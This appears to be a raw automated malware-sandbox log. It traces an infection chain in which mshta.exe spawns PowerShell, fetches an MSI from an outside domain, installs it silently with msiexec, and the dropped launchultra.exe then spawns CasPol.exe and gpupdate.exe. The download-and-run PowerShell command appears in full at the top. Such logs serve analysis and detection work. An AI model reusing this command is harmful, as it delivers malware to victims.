            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 58173891FD6DF8D2CFA7B3CDEE856639
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 58173891FD6DF8D2CFA7B3CDEE856639
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Inkberry\launchultra.exe "C:\Users\user\AppData\Local\Inkberry\launchultra.exe"
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeProcess created: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe C:\Users\user\AppData\Local\Temp\73763\CasPol.exe
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe C:\Windows\SysWOW64\gpupdate.exe
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess created: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe "C:\Users\user\AppData\Local\Temp\73763\CasPol.exe"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeProcess created: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe C:\Users\user\AppData\Local\Temp\73763\CasPol.exe
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe C:\Windows\SysWOW64\gpupdate.exe
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess created: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe "C:\Users\user\AppData\Local\Temp\73763\CasPol.exe"
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: aclayers.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: sfc.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: gameoptimizer.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: input.dll
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: aclayers.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: sfc.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: wevtapi.dll
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: bitsproxy.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: aclayers.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: sfc.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\gpupdate.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E3205E05-7972-45C4-8321-B26BB5BCDBB2}

            Data Obfuscation

            barindex
